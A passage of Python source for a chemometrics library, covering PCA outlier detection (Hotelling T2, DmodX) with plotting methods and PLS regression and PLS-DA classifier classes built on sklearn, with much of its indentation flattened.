self.loadings = self.pca_algorithm.components_
# set fitted to true
self.isfitted = True
except ValueError as ver:
raise ver
def hotelling_T2(self, comps=None, alpha=0.05):
"""
Obtain the parameters for the Hotelling T2 ellipse at the desired significance level.
        :param comps: which components to use, defaults to None (all model components)
        :type comps: list or None
        :param alpha: significance level, defaults to 0.05
        :type alpha: float
        :return: the Hotelling T2 ellipsoid radii at vertex
        :rtype: numpy.ndarray
        :raise AttributeError: If the model is not fitted
        :raise ValueError: If the components requested exceed the number of components in the model
        :raise TypeError: If comps is not None or a list/numpy 1d array, or alpha is not a float
"""
try:
if self.isfitted is False:
raise AttributeError("Model is not fitted yet ")
n_samples = self.scores.shape[0]
if comps is None:
n_comps = self.n_comps
ellips = self.scores[:, range(self.n_comps)] ** 2
ellips = 1 / n_samples * (ellips.sum(0))
else:
n_comps = len(comps)
ellips = self.scores[:, comps] ** 2
ellips = 1 / n_samples * (ellips.sum(0))
# F stat
fs = (n_samples - 1) / n_samples * n_comps * (n_samples ** 2 - 1) / (n_samples * (n_samples - n_comps))
fs = fs * f.ppf(1 - alpha, n_comps, n_samples - n_comps)
hoteling_t2 = list()
for comp in range(n_comps):
hoteling_t2.append(np.sqrt((fs * ellips[comp])))
return np.array(hoteling_t2)
except AttributeError as atrer:
raise atrer
except ValueError as valer:
raise valer
except TypeError as typer:
raise typer
def dmodx(self, x):
"""
Normalised DmodX measure
        :param x: data matrix to be fit
        :type x: numpy.ndarray, shape (rows : samples , columns : variables )
        :return: the normalised DmodX measure for each sample
        :rtype: numpy.ndarray
"""
resids_ssx = self._residual_ssx(x)
s = np.sqrt(resids_ssx / (self.loadings.shape[1] - self.n_comps))
dmodx = np.sqrt((s / self.m_params['S0']) ** 2)
return dmodx
def _dmodx_fcrit(self, x, alpha=0.05):
"""
        Calculate the critical F value for the DmodX measure
        :param alpha: significance level, defaults to 0.05
        :type alpha: float
        :return: DmodX F-critical value
        :rtype: float
"""
# Degrees of freedom for the PCA model (denominator in F-stat)
dmodx_fcrit = f.ppf(1 - alpha, x.shape[1] - self.n_comps - 1,
(x.shape[0] - self.n_comps - 1) * (x.shape[1] - self.n_comps))
return dmodx_fcrit
def outlier(self, x, comps=None, measure='T2', alpha=0.05):
"""
        use the F statistic and the T2 / DmodX measure to determine outliers
        :param x: data matrix to be fit
        :type x: numpy.ndarray, shape (rows : samples , columns : variables )
        :param comps: which components to use (for Hotelling T2 only), defaults to None
        :type comps: int or None
        :param measure: 'T2' or 'DmodX', defaults to 'T2'
        :type measure: str
        :param alpha: significance level, defaults to 0.05
        :type alpha: float
        :return: list of outlier indices
        :rtype: list
"""
try:
if measure == 'T2':
scores = self.transform(x)
t2 = self.hotelling_T2(comps=comps)
outlier_idx = np.where(((scores ** 2) / t2 ** 2).sum(axis=1) > 1)[0]
elif measure == 'DmodX':
dmodx = self.dmodx(x)
dcrit = self._dmodx_fcrit(x, alpha)
outlier_idx = np.where(dmodx > dcrit)[0]
else:
print("Select T2 (Hotelling T2) or DmodX as outlier exclusion criteria")
return outlier_idx
except Exception as exp:
raise exp
def score_plot(self):
""" plot the projection of the x scores on the firest 2 components
:param x : data metrix to be fit
:type x: numpy.ndarray, shape (rows : samples , columns : variables )
:return 2 dimentional scatter plot """
try:
if self.isfitted == False:
raise AttributeError("Model is not fitted yet ")
plt.scatter(self.scores[:, 0], self.scores[:, 1] , s=100, edgecolors='k',)
for i in range(self.scores.shape[0]):
plt.text(x=self.scores[i, 0] + 0.3, y=self.scores[i, 1] + 0.3, s=i + 1)
plt.xlabel('PC 1')
plt.ylabel('PC 2')
plt.title('PCA score plot')
plt.show()
except AttributeError as atter:
raise atter
except TypeError as typer:
raise typer
def scree_plot(self):
""" plot the explained varianace of each componant in the PCA model
:param x : data metrix to be fit
:type x: numpy.ndarray, shape (rows : samples , columns : variables )
:return scree plot """
try:
if self.isfitted == False:
raise AttributeError("Model is not fitted yet ")
features = ['PC ' + str(x) for x in range(1, self.n_comps + 1)]
plt.bar(features, self.m_params['VarExpRatio'], color='black')
plt.ylabel('variance %')
plt.xlabel('PCA features')
            # tick labels are already supplied by plt.bar(features, ...)
plt.title('Scree plot')
plt.show()
except AttributeError as atter:
raise atter
except TypeError as typer:
raise typer
def outlier_plot(self, x, comps=None, measure='T2', alpha=0.05):
""" detect outlier in x metric based on their variance and plot them with different color
:param x : data metrix to be fit
:type x: numpy.ndarray, shape (rows : samples , columns : variables )
:param comps: Which components to use (for Hotelling T2 only) defaults to None
:type int or None
:param measure: T2 or DmodX defaults to 'T2'
:type str
:param alpha: Significance level defaults to 0.05
:type float
:return scree plot """
try:
if self.isfitted == False:
raise AttributeError("Model is not fitted yet ")
            # get outlier indices
outliers = self.outlier(x=x, comps=comps, measure=measure, alpha=alpha)
            # indices of non-outliers
not_outliers = [x for x in np.arange(self.scores.shape[0]) if x not in outliers]
plt.scatter(self.scores[not_outliers, 0], self.scores[not_outliers, 1], color='black', label='not outlier' ,s=100, edgecolors='k',)
plt.scatter(self.scores[outliers, 0], self.scores[outliers, 1], color='r', label='outlier' , s=100, edgecolors='k',)
for i in range(self.scores.shape[0]):
plt.text(x=self.scores[i, 0] + 0.3, y=self.scores[i, 1] + 0.3, s=i + 1)
plt.ylabel('PCA 2')
plt.xlabel('PCA 1')
plt.legend()
plt.title('outliers plot')
plt.show()
except AttributeError as atter:
raise atter
except TypeError as typer:
raise typer
def target_plot(self, y):
""" the same as score plot but instead but we add color to each sample based on their classe
:param x : data metrix to be fit
:type x: numpy.ndarray, shape (rows : samples , columns : variables )
:params y : target variable (list) (each class has unique integer value)
:return scree plot """
assert isinstance(y, (list, np.ndarray)) and len(y) == self.scores.shape[0]
try:
if self.isfitted == False:
raise AttributeError("Model is not fitted yet ")
targets = np.unique(y)
colors = ['r', 'g']
for target, color in zip(targets, colors):
indicesToKeep = [x for x in np.arange(self.scores.shape[0]) if y[x] == target]
plt.scatter(self.scores[indicesToKeep, 0]
, self.scores[indicesToKeep, 1]
, c=color, label='class ' + str(target) ,s=100, edgecolors='k',
)
for i in range(self.scores.shape[0]):
plt.text(x=self.scores[i, 0] + 0.3, y=self.scores[i, 1] + 0.3, s=i + 1)
plt.ylabel('PCA 2')
plt.xlabel('PCA 1')
plt.legend()
plt.title('target plot')
plt.show()
except AttributeError as atter:
raise atter
except TypeError as typer:
raise typer
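# A minimal PyPCA usage sketch (`X` is a hypothetical samples-by-variables
# numpy array and `y` a vector of integer class labels):
#
#   model = PyPCA(n_comps=2)
#   scores = model.fit_transform(X)
#   print(model.m_params['R2X'], model.m_params['VarExpRatio'])
#   outlier_idx = model.outlier(X, measure='T2')
#   model.target_plot(y)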
#########################################################################
class PyPLS(BaseEstimator, RegressorMixin, TransformerMixin):
"""
    PyPLS object, similar to the PLS model in the cross decomposition module of sklearn.
    This object is used for the calculation of PLS-DA params (R2X, R2Y).
    The implementation of this algorithm is taken from the SIMPLS implementation
    (SIMPLS calculates the PLS factors directly as linear combinations of the original variables).
    You can check the original paper "SIMPLS: An alternative approach to partial least squares regression", DOI : "https://doi.org/10.1016/0169-7439(93)85002-X"
    :param scores_t: projection of X (default None)
    :type scores_t: data matrix
    :param scores_u: projection of Y (default None)
    :type scores_u: data matrix
    :param isfitted: indicates whether the model is fitted or not (default None)
    :type isfitted: bool
    :param weights_w: maximum covariance of X with Y (default None)
    :type weights_w: data matrix
    :param loadings_p: model loadings, similar to PCA loadings, associating T with X (default None)
    :type loadings_p: data matrix
    :param loadings_q: model loadings, similar to PCA loadings, associating U with Y (default None)
    :type loadings_q: data matrix
    :param rotations_ws: the rotation of X in the latent variable space (default None)
    :type rotations_ws: data matrix
    :param rotations_cs: the rotation of Y in the latent variable space (default None)
    :type rotations_cs: data matrix
    :param b_u: the beta from regressing T on U (default None)
    :type b_u: data matrix
    :param b_t: the beta from regressing U on T (default None)
    :type b_t: data matrix
    :param ncomps: number of components (latent variables) (default 2)
    :type ncomps: int
    :param beta_coeffs: the coefficients of the PLS regression model (default None)
    :type beta_coeffs: data matrix
    :param x_scaler: scaler used on the independent variables X (default None)
    :type x_scaler: sklearn scaler
    :param y_scaler: scaler used on the target variable Y (default None)
    :type y_scaler: sklearn scaler
    :param m_params: the model parameters after fitting
    :type m_params: dict
"""
def __init__(self, ncomps=2, xscaler=StandardScaler()):
"""Constructor method
"""
try:
            # call the sklearn PLS model with the same number of components
            pls_algorithm = PLSRegression(n_components=ncomps, scale=False)
            # verify that the provided scaler is an sklearn-based scaler or None
            assert isinstance(xscaler, TransformerMixin) or xscaler is None, "scaler used is not defined"
            self.pls_algorithm = pls_algorithm
            # assign most variables to None; they will be set when the fit function is called
            self.scores_t = None  # projection of X
            self.scores_u = None  # projection of Y
            self.weights_w = None  # maximum covariance of X with Y
            self.weights_c = None  # maximum covariance
            self.loadings_p = None  # model loadings, similar to PCA loadings, associating T with X
            self.loadings_q = None  # model loadings, similar to PCA loadings, associating U with Y
            self.rotations_ws = None  # the rotation of X in the latent variable space
            self.rotations_cs = None  # the rotation of Y in the latent variable space
            self.b_u = None  # the beta from regressing T on U
            self.b_t = None  # the beta from regressing U on T
            self.beta_coeffs = None  # the coefficients of the PLS regression model
            self.ncomps = ncomps  # number of components (latent variables)
            self.x_scaler = xscaler  # scaler used on the independent variables X
            self.y_scaler = StandardScaler(with_std=False)  # scaler used on the dependent variable Y
            self.cvParameters = None  # cross validation params
            self.m_params = None  # model params
            self.isfitted = False  # boolean flag indicating whether the model is fitted
except TypeError as terr:
print(terr.args[0])
def fit(self, x, y):
"""
        fit the model to get all model coefficients and scores, and compute the goodness of fit (R2X and R2Y)
        :param x: data matrix to be fit
        :type x: numpy.ndarray, shape (rows : samples , columns : variables )
        :param y: dependent (target) variable
:type y: list or 1d array
:raise ValueError: If any problem occurs during fitting.
"""
try:
x = np.array(x)
            # reshape y by adding an extra dimension (requirement for PLS regression fitting)
            if y.ndim == 1:
                y = y.reshape(-1, 1)
            # reshape x by adding an extra dimension (requirement for PLS regression fitting)
            if x.ndim == 1:
                x = x.reshape(-1, 1)
            # scale x if a scaler is provided
            if self.x_scaler is None:
                xscaled = x
            else:
                xscaled = self.x_scaler.fit_transform(x)
            yscaled = self.y_scaler.fit_transform(y)
            # fit the sklearn PLS regression model to the scaled x and y data
            self.pls_algorithm.fit(xscaled, yscaled)
# Expose the model parameters
self.loadings_p = self.pls_algorithm.x_loadings_
self.loadings_q = self.pls_algorithm.y_loadings_
self.weights_w = self.pls_algorithm.x_weights_
self.weights_c = self.pls_algorithm.y_weights_
self.rotations_ws = self.pls_algorithm.x_rotations_
            # calculate the rotations from the weights and loadings
self.rotations_cs = np.dot(np.linalg.pinv(np.dot(self.weights_c, self.loadings_q.T)), self.weights_c)
self.scores_t = self.pls_algorithm.x_scores_
self.scores_u = self.pls_algorithm.y_scores_
# calculate beta from scores T and U
self.b_u = np.dot(np.dot(np.linalg.pinv(np.dot(self.scores_u.T, self.scores_u)), self.scores_u.T),
self.scores_t)
self.b_t = np.dot(np.dot(np.linalg.pinv(np.dot(self.scores_t.T, self.scores_t)), self.scores_t.T),
self.scores_u)
self.beta_coeffs = self.pls_algorithm.coef_
# save that the model is fitted
self.isfitted = True
            # get R2X and R2Y by calling the score function
R2Y = PyPLS.score(self, x=x, y=y, block_to_score='y')
R2X = PyPLS.score(self, x=x, y=y, block_to_score='x')
            # get SSY, SSX and the per-component SSX and SSY
cm_fit = self.cummulativefit(x, y)
self.m_params = {'R2Y': R2Y, 'R2X': R2X, 'SSX': cm_fit['SSX'], 'SSY': cm_fit['SSY'],
'SSXcomp': cm_fit['SSXcomp'], 'SSYcomp': cm_fit['SSYcomp']}
# calculate the sum of squares
resid_ssx = self._residual_ssx(x)
s0 = np.sqrt(resid_ssx.sum() / ((self.scores_t.shape[0] - self.ncomps - 1) * (x.shape[1] - self.ncomps)))
self.m_params['S0X'] = s0
except ValueError as verr:
raise
def score(self, x, y, block_to_score='y', sample_weight=None):
"""
        function to calculate R2X and R2Y
        :param x: data matrix to be fit
        :type x: numpy.ndarray, shape (rows : samples , columns : variables )
        :param y: target variable
        :type y: list or 1d array
        :param block_to_score: choose whether to calculate R2X or R2Y, defaults to 'y'
        :type block_to_score: str
        :param sample_weight: optional sample weights to use in scoring, defaults to None
        :return R2Y: by predicting Y from X we get R2Y
        :return R2X: by predicting X from Y we get R2X
        :rtype: float
        :raise ValueError: If the block_to_score argument is not acceptable, or there are data mismatch issues with the provided data.
"""
try:
if block_to_score not in ['x', 'y']:
raise ValueError("x or y are the only accepted values for block_to_score")
            # reshape y by adding an extra dimension (requirement for PLS regression fitting)
            if y.ndim == 1:
                y = y.reshape(-1, 1)
            # reshape x by adding an extra dimension (requirement for PLS regression fitting)
            if x.ndim == 1:
                x = x.reshape(-1, 1)
# calculate R2Y
if block_to_score == 'y':
yscaled = deepcopy(self.y_scaler).fit_transform(y)
tssy = np.sum(np.square(yscaled)) # total sum of squares
ypred = self.y_scaler.transform(PyPLS.predict(self, x, y=None)) # prediction of Y from X
                rssy = np.sum(np.square(yscaled - ypred))  # residual sum of squares
R2Y = 1 - (rssy / tssy)
return R2Y
# calculate R2X
else:
                if self.x_scaler is None:
                    xscaled = x
                else:
                    xscaled = deepcopy(self.x_scaler).fit_transform(x)  # scale X
                # Calculate the total sum of squares of X for the R2X calculation
                xpred = self.x_scaler.transform(PyPLS.predict(self, x=None, y=y))
                tssx = np.sum(np.square(xscaled))  # total sum of squares
                rssx = np.sum(np.square(xscaled - xpred))  # residual sum of squares
R2X = 1 - (rssx / tssx)
return R2X
except ValueError as verr:
raise verr
def predict(self, x=None, y=None):
"""
predict y from X or X from Y
        :param x: data matrix to be fit, defaults to None
        :type x: numpy.ndarray, shape (rows : samples , columns : variables )
        :param y: target variable, defaults to None
:type y: list or 1d array
:return: Predicted data block (X or Y) obtained from the other data block.
:rtype: numpy.ndarray, shape [n_samples]
:raise ValueError: If no data matrix is passed, or dimensions mismatch issues with the provided data.
:raise AttributeError: Calling the method without fitting the model before.
"""
try:
            # check whether the model is fitted or not
if self.isfitted is True:
if (x is not None) and (y is not None):
raise ValueError('target variable or predictive variable must be None ')
# If nothing is passed at all, complain and do nothing
elif (x is None) and (y is None):
                    raise ValueError('both predictive and target variables are None')
# Predict Y from X
elif x is not None:
if x.ndim == 1:
x = x.reshape(-1, 1)
                    # scale X if a scaler is provided (use transform, not fit_transform,
                    # so the scaler fitted during fit() is not refit on new data)
                    if self.x_scaler is None:
                        xscaled = x
                    else:
                        xscaled = self.x_scaler.transform(x)
# Using Betas to predict Y directly
predicted = np.dot(xscaled, self.beta_coeffs)
if predicted.ndim == 1:
predicted = predicted.reshape(-1, 1)
predicted = self.y_scaler.inverse_transform(predicted)
return predicted
# Predict X from Y
elif y is not None:
# Going through calculation of U and then X = Ub_uW'
u_scores = PyPLS.transform(self, x=None, y=y)
predicted = np.dot(np.dot(u_scores, self.b_u), self.weights_w.T)
if predicted.ndim == 1:
predicted = predicted.reshape(-1, 1)
predicted = self.x_scaler.inverse_transform(predicted)
return predicted
else:
raise AttributeError("Model is not fitted")
except ValueError as verr:
raise verr
except AttributeError as atter:
raise atter
def transform(self, x=None, y=None):
"""
        calculate the U or T matrix, equivalent to sklearn's TransformerMixin
        :param x: data matrix to be fit, defaults to None
        :type x: numpy.ndarray, shape (rows : samples , columns : variables )
        :param y: target variable, defaults to None
:type y: list or 1d array
:return: Latent Variable scores (T) for the X matrix and for the Y vector/matrix (U).
:rtype: tuple with 2 numpy.ndarray, shape (n_samples, n_comps)
:raise ValueError: If dimensions of input data are mismatched.
:raise AttributeError: When calling the method before the model is fitted.
"""
try:
# Check if model is fitted
if self.isfitted is True:
if (x is not None) and (y is not None):
raise ValueError('target variable or predictive variable must be None ')
# If nothing is passed at all, complain and do nothing
elif (x is None) and (y is None):
                    raise ValueError('both predictive and target variables are None')
# If Y is given, return U
elif x is None:
                    # reshape y by adding an extra dimension if y is a vector
if y.ndim == 1:
y = y.reshape(-1, 1)
yscaled = self.y_scaler.transform(y)
U = np.dot(yscaled, self.rotations_cs)
return U
# If X is given, return T
elif y is None:
                    # reshape x by adding an extra dimension if it's a vector
if x.ndim == 1:
x = x.reshape(-1, 1)
xscaled = self.x_scaler.transform(x)
T = np.dot(xscaled, self.rotations_ws)
return T
else:
raise AttributeError('Model not fitted')
except ValueError as verr:
raise verr
except AttributeError as atter:
raise atter
def cummulativefit(self, x, y):
"""
        calculate the cumulative sum of squares
        :param x: data matrix to be fit
        :type x: numpy.ndarray, shape (rows : samples , columns : variables )
        :param y: target variable
        :type y: list or 1d array
        :return: dictionary object containing the total Regression Sum of Squares and the Sum of Squares
            per component, for both the X and Y data blocks.
        :rtype: dict
"""
        # reshape y if the number of dimensions is 1
        if y.ndim == 1:
            y = y.reshape(-1, 1)
        # reshape x if the number of dimensions is 1
        if x.ndim == 1:
            x = x.reshape(-1, 1)
        # verify whether the model is fitted
        if self.isfitted is False:
            raise AttributeError('fit model first')
        if self.x_scaler is None:
            xscaled = x
        else:
            xscaled = self.x_scaler.fit_transform(x)
yscaled = self.y_scaler.transform(y)
# Obtain residual sum of squares for whole data set and per component
        SSX = np.sum(np.square(xscaled))  # sum of squares of the predictive variables
        SSY = np.sum(np.square(yscaled))  # sum of squares of the target variable
        ssx_comp = list()
        ssy_comp = list()
        # calculate the sum of squares for each component
for curr_comp in range(1, self.ncomps + 1):
model = self._reduce_ncomps(curr_comp)
ypred = PyPLS.predict(model, x, y=None)
xpred = self.x_scaler.transform(PyPLS.predict(model, x=None, y=y))
rssy = np.sum(np.square(y - ypred))
rssx = np.sum(np.square(xscaled - xpred))
ssx_comp.append(rssx)
ssy_comp.append(rssy)
# save the result
cumulative_fit = {'SSX': SSX, 'SSY': SSY, 'SSXcomp': np.array(ssx_comp), 'SSYcomp': np.array(ssy_comp)}
return cumulative_fit
def _reduce_ncomps(self, n__comps):
"""
        get a similar model with a reduced number of components
        :param n__comps: number of components
        :type n__comps: int
        :return: PyPLS object with a reduced number of components.
:rtype: PyPLS instance
:raise ValueError: If number of components desired is larger than original number of components
:raise AttributeError: If model is not fitted.
"""
try:
            # raise an error if the number of components of the new model is bigger than the original
if n__comps > self.ncomps:
raise ValueError('Fit a new model with more components instead')
# verify that the model is fitted or not
if self.isfitted is False:
raise AttributeError('Model not Fitted')
# get the new model variable
newmodel = deepcopy(self)
newmodel.ncomps = n__comps
newmodel.modelParameters = None
newmodel.cvParameters = None
newmodel.loadings_p = self.loadings_p[:, 0:n__comps]
newmodel.weights_w = self.weights_w[:, 0:n__comps]
newmodel.weights_c = self.weights_c[:, 0:n__comps]
newmodel.loadings_q = self.loadings_q[:, 0:n__comps]
newmodel.rotations_ws = self.rotations_ws[:, 0:n__comps]
newmodel.rotations_cs = self.rotations_cs[:, 0:n__comps]
newmodel.scores_t = None
newmodel.scores_u = None
newmodel.b_t = self.b_t[0:n__comps, 0:n__comps]
newmodel.b_u = self.b_u[0:n__comps, 0:n__comps]
# These have to be recalculated from the rotations
newmodel.beta_coeffs = np.dot(newmodel.rotations_ws, newmodel.loadings_q.T)
return newmodel
except ValueError as verr:
raise verr
except AttributeError as atter:
raise atter
def inverse_transform(self, t=None, u=None):
"""
        inverse transform: generate x and y from the U and T scores
        :param t: T scores corresponding to the X data matrix.
        :param u: Y scores corresponding to the Y data vector/matrix.
        :return x: data matrix (rows : samples , columns : variables )
:return y: target variable
:rtype: numpy.ndarray, shape [n_samples, n_features] or None
:raise ValueError: If dimensions of input data are mismatched.
"""
try:
            # check whether the model is fitted or not
if self.isfitted is True:
if t is not None and u is not None:
raise ValueError('u or t must be None')
elif t is None and u is None:
raise ValueError('both variable are None ')
elif t is not None:
                    # get the x prediction from t and the transpose of the p loadings
xpred = np.dot(t, self.loadings_p.T)
if self.x_scaler is not None:
xscaled = self.x_scaler.inverse_transform(xpred)
else:
xscaled = xpred
return xscaled
                # If U is given, return the Y prediction
elif u is not None:
# get the prediction from u and q loadings transpose
ypred = np.dot(u, self.loadings_q.T)
yscaled = self.y_scaler.inverse_transform(ypred)
return yscaled
except ValueError as verr:
raise verr
def _residual_ssx(self, x):
"""
        calculate the residual sum of squares
        :param x: data matrix
        :type x: numpy.ndarray, shape (rows : samples , columns : variables )
        :return: the residual sum of squares per sample
        :rtype: numpy.ndarray
"""
        # transform x to latent variables
pred_scores = self.transform(x)
# transform the latent variables back to original space
x_reconstructed = self.x_scaler.transform(self.inverse_transform(pred_scores))
        # scale x if a scaler is provided
        if self.x_scaler is None:
            xscaled = x
        else:
            xscaled = self.x_scaler.fit_transform(x)
        # calculate the residuals
residuals = np.sum(np.square(xscaled - x_reconstructed), axis=1)
return residuals
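# A minimal PyPLS usage sketch (`X` and `y` are hypothetical numpy arrays):
#
#   pls = PyPLS(ncomps=2)
#   pls.fit(X, y)
#   print(pls.m_params['R2X'], pls.m_params['R2Y'])
#   y_hat = pls.predict(x=X)   # predict Y from X via the beta coefficients
#   T = pls.transform(x=X)     # X scores in the latent-variable space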
############################################################
class PyPLS_DA(PyPLS, ClassifierMixin):
"""
    PyPLS_DA object - performs standard Partial Least Squares regression to classify samples.
    The plsda function fits PLS models with 1,...,ncomp components to the factor or class vector Y. The appropriate indicator matrix is created.
    A standard scaler or any other scaling technique is applied as an internal pre-processing step.
    See:
    - Indhal et. al., From dummy regression to prior probabilities in PLS-DA, Journal of Chemometrics, 2007
    - Barker, Matthew, <NAME>, Partial least squares for discrimination, Journal of Chemometrics, 2003
    - Brereton, <NAME>, <NAME>., Partial least squares discriminant analysis: Taking the magic away,
    Journal of Chemometrics, 2014
    Model performance metrics employed are the Q2Y, Area under the curve and ROC curves, f1 measure, balanced accuracy,
    precision, recall, confusion matrices and 0-1 loss.
    :param scores_t: projection of X (default None)
    :type scores_t: data matrix
    :param scores_u: projection of Y (default None)
    :type scores_u: data matrix
    :param isfitted: indicates whether the model is fitted or not (default None)
    :type isfitted: bool
    :param weights_w: maximum covariance of X with Y (default None)
    :type weights_w: data matrix
    :param loadings_p: model loadings, similar to PCA loadings, associating T with X (default None)
    :type loadings_p: data matrix
    :param loadings_q: model loadings, similar to PCA loadings, associating U with Y (default None)
    :type loadings_q: data matrix
    :param rotations_ws: the rotation of X in the latent variable space (default None)
    :type rotations_ws: data matrix
    :param rotations_cs: the rotation of Y in the latent variable space (default None)
    :type rotations_cs: data matrix
    :param b_u: the beta from regressing T on U (default None)
    :type b_u: data matrix
    :param b_t: the beta from regressing U on T (default None)
    :type b_t: data matrix
    :param ncomps: number of components (latent variables) (default 2)
    :type ncomps: int
    :param beta_coeffs: the coefficients of the PLS regression model (default None)
    :type beta_coeffs: data matrix
    :param x_scaler: scaler used on the independent variables X (default None)
    :type x_scaler: sklearn scaler
    :param y_scaler: scaler used on the target variable Y (default None)
    :type y_scaler: sklearn scaler
    :param m_params: the model parameters after fitting
    :type m_params: dict
    :param cvParameters: the model parameters after cross validation, such as Q2
    :type cvParameters: dict
    :param n_classes: number of distinct classes in the target variable
    :type n_classes: int
"""
def __init__(self, ncomps=2, xscaler=StandardScaler()):
"""Constructor method
"""
        pls_algorithm = PLSRegression(n_components=ncomps, scale=False)
        try:
            # check whether the provided scaler is an sklearn scaler or not
            assert isinstance(xscaler,
                              TransformerMixin) or xscaler is None, "scaler must be an sklearn transformer-like or None"
            self.pls_algorithm = pls_algorithm
            # set the model variables; most are set to None here because they change when the model is fitted
            self.scores_t = None  # projection of X
            self.scores_u = None  # projection of Y
            self.weights_w = None  # maximum covariance of X with Y
            self.weights_c = None  # maximum covariance
            self.loadings_p = None  # model loadings, similar to PCA loadings, associating T with X
            self.loadings_q = None  # model loadings, similar to PCA loadings, associating U with Y
            self.rotations_ws = None  # the rotation of X in the latent variable space
            self.rotations_cs = None  # the rotation of Y in the latent variable space
            self.b_u = None  # the beta from regressing T on U
            self.b_t = None  # the beta from regressing U on T
            self.beta_coeffs = None  # the coefficients of the PLS regression model
            self.n_classes = None  # number of distinct classes in the target variable
            self.class_means = None
            self.ncomps = ncomps  # number of components (latent variables)
            self.x_scaler = xscaler  # scaler used on the independent variables X
            self.y_scaler = StandardScaler(with_std=False)  # scaler used on the dependent variable Y
            self.cvParameters = None  # cross validation params
            self.m_params = None  # model params
            self.isfitted = False  # boolean flag indicating whether the model is fitted
except TypeError as ter:
print(ter.args[0])
raise ter
def fit(self, x, y, ):
"""
Fit model to data (x and y)
        :param x: array-like data matrix
        :type x: numpy.ndarray, shape (rows : samples , columns : variables )
        :param y: target variable
:type y: list or 1d array
:raise ValueError: If any problem occurs during fitting.
"""
try:
            # reshape x if the number of dimensions equals 1, by adding an extra dimension
            if x.ndim == 1:
                x = x.reshape(-1, 1)
            # if the scaler is not None, scale x
            if self.x_scaler is None:
                xscaled = x
            else:
                xscaled = self.x_scaler.fit_transform(x)
            # get the number of classes
            n_classes = np.unique(y).size
            self.n_classes = n_classes
            # create a dummy matrix if the number of classes exceeds 2
            if self.n_classes > 2:
                dummy_mat = pd.get_dummies(y).values
                y_scaled = self.y_scaler.fit_transform(dummy_mat)
            else:
                # if the number of dimensions equals 1, add an extra dimension
                if y.ndim == 1:
                    y = y.reshape(-1, 1)
                y_scaled = self.y_scaler.fit_transform(y)
# fit PLS regression model
self.pls_algorithm.fit(xscaled, y_scaled)
# get the model params from the fitted PLS model
self.loadings_p = self.pls_algorithm.x_loadings_
self.loadings_q = self.pls_algorithm.y_loadings_
self.weights_w = self.pls_algorithm.x_weights_
self.weights_c = self.pls_algorithm.y_weights_
self.rotations_ws = self.pls_algorithm.x_rotations_
# calculate rotation and beta variable using loading and weight of PLS model
self.rotations_cs = np.dot(np.linalg.pinv(np.dot(self.weights_c, self.loadings_q.T)), self.weights_c)
self.scores_t = self.pls_algorithm.x_scores_
self.scores_u = self.pls_algorithm.y_scores_
self.b_u = np.dot(np.dot(np.linalg.pinv(np.dot(self.scores_u.T, self.scores_u)), self.scores_u.T),
self.scores_t)
self.b_t = np.dot(np.dot(np.linalg.pinv(np.dot(self.scores_t.T, self.scores_t)), self.scores_t.T),
self.scores_u)
self.beta_coeffs = self.pls_algorithm.coef_
# create class mean matrix based on obtained T score
self.class_means = np.zeros((n_classes, self.ncomps))
for curr_class in range(self.n_classes):
curr_class_idx = np.where(y == curr_class)
self.class_means[curr_class, :] = np.mean(self.scores_t[curr_class_idx])
# save that the model is fitted
self.isfitted = True
            # calculate R2X and R2Y for both binary and non-binary classification
if self.n_classes > 2:
R2Y = PyPLS.score(self, x=x, y=dummy_mat, block_to_score='y')
R2X = PyPLS.score(self, x=x, y=dummy_mat, block_to_score='x')
else:
R2Y = PyPLS.score(self, x=x, y=y, block_to_score='y')
R2X = PyPLS.score(self, x=x, y=y, block_to_score='x')
# constant grid for ROC
fpr_grid = np.linspace(0, 1, num=20)
# get class scores
class_score = PyPLS.predict(self, x=x)
            # binary classification
if n_classes == 2:
y_pred = self.predict(x)
accuracy = metrics.accuracy_score(y, y_pred)
precision = metrics.precision_score(y, y_pred)
recall = metrics.recall_score(y, y_pred)
misclassified_samples = np.where(y.ravel() != y_pred.ravel())[0]
f1_score = metrics.f1_score(y, y_pred)
conf_matrix = metrics.confusion_matrix(y, y_pred)
zero_oneloss = metrics.zero_one_loss(y, y_pred)
matthews_mcc = metrics.matthews_corrcoef(y, y_pred)
# Interpolated ROC curve and AUC
roc_curve = metrics.roc_curve(y, class_score.ravel())
tpr = roc_curve[1]
fpr = roc_curve[0]
interpolated_tpr = np.zeros_like(fpr_grid)
interpolated_tpr += interp(fpr_grid, fpr, tpr)
roc_curve = (fpr_grid, interpolated_tpr, roc_curve[2])
auc_area = metrics.auc(fpr_grid, interpolated_tpr)
else:
# multi class classification
y_pred = self.predict(x)
accuracy = metrics.accuracy_score(y, y_pred)
precision = metrics.precision_score(y, y_pred, average='weighted')
recall = metrics.recall_score(y, y_pred, average='weighted')
misclassified_samples = np.where(y.ravel() != y_pred.ravel())[0]
f1_score = metrics.f1_score(y, y_pred, average='weighted')
conf_matrix = metrics.confusion_matrix(y, y_pred)
zero_oneloss = metrics.zero_one_loss(y, y_pred)
matthews_mcc = np.nan
roc_curve = list()
auc_area = list()
# Generate multiple ROC curves - one for each class the multiple class case
for predclass in range(self.n_classes):
current_roc = metrics.roc_curve(y, class_score[:, predclass], pos_label=predclass)
# Interpolate all ROC curves to a finite grid
# Makes it easier to average and compare multiple models - with CV in mind
tpr = current_roc[1]
fpr = current_roc[0]
interpolated_tpr = np.zeros_like(fpr_grid)
interpolated_tpr += interp(fpr_grid, fpr, tpr)
roc_curve.append([fpr_grid, interpolated_tpr, current_roc[2]])
auc_area.append(metrics.auc(fpr_grid, interpolated_tpr))
# Obtain residual sum of squares for whole data set and per component
# Same as Chemometrics PLS, this is so we can use VIP's and other metrics as usual
if self.n_classes > 2:
cm_fit = self.cummulativefit(x, dummy_mat)
else:
cm_fit = self.cummulativefit(x, y)
# save the model params
self.m_params = {'PLS': {'R2Y': R2Y, 'R2X': R2X, 'SSX': cm_fit['SSX'], 'SSY': cm_fit['SSY'],
'SSXcomp': cm_fit['SSXcomp'], 'SSYcomp': cm_fit['SSYcomp']},
'DA': {'Accuracy': accuracy, 'AUC': auc_area,
'ConfusionMatrix': conf_matrix, 'ROC': roc_curve,
'MisclassifiedSamples': misclassified_samples,
'Precision': precision, 'Recall': recall,
'F1': f1_score, '0-1Loss': zero_oneloss, 'MatthewsMCC': matthews_mcc,
'ClassPredictions': y_pred}}
except ValueError as verr:
raise verr
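    # A minimal PyPLS_DA usage sketch (`X` is a hypothetical data matrix and
    # `y` a vector of integer class labels):
    #
    #   plsda = PyPLS_DA(ncomps=2)
    #   plsda.fit(X, y)
    #   print(plsda.m_params['DA']['Accuracy'], plsda.m_params['DA']['AUC'])
    #   y_pred = plsda.predict(X)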
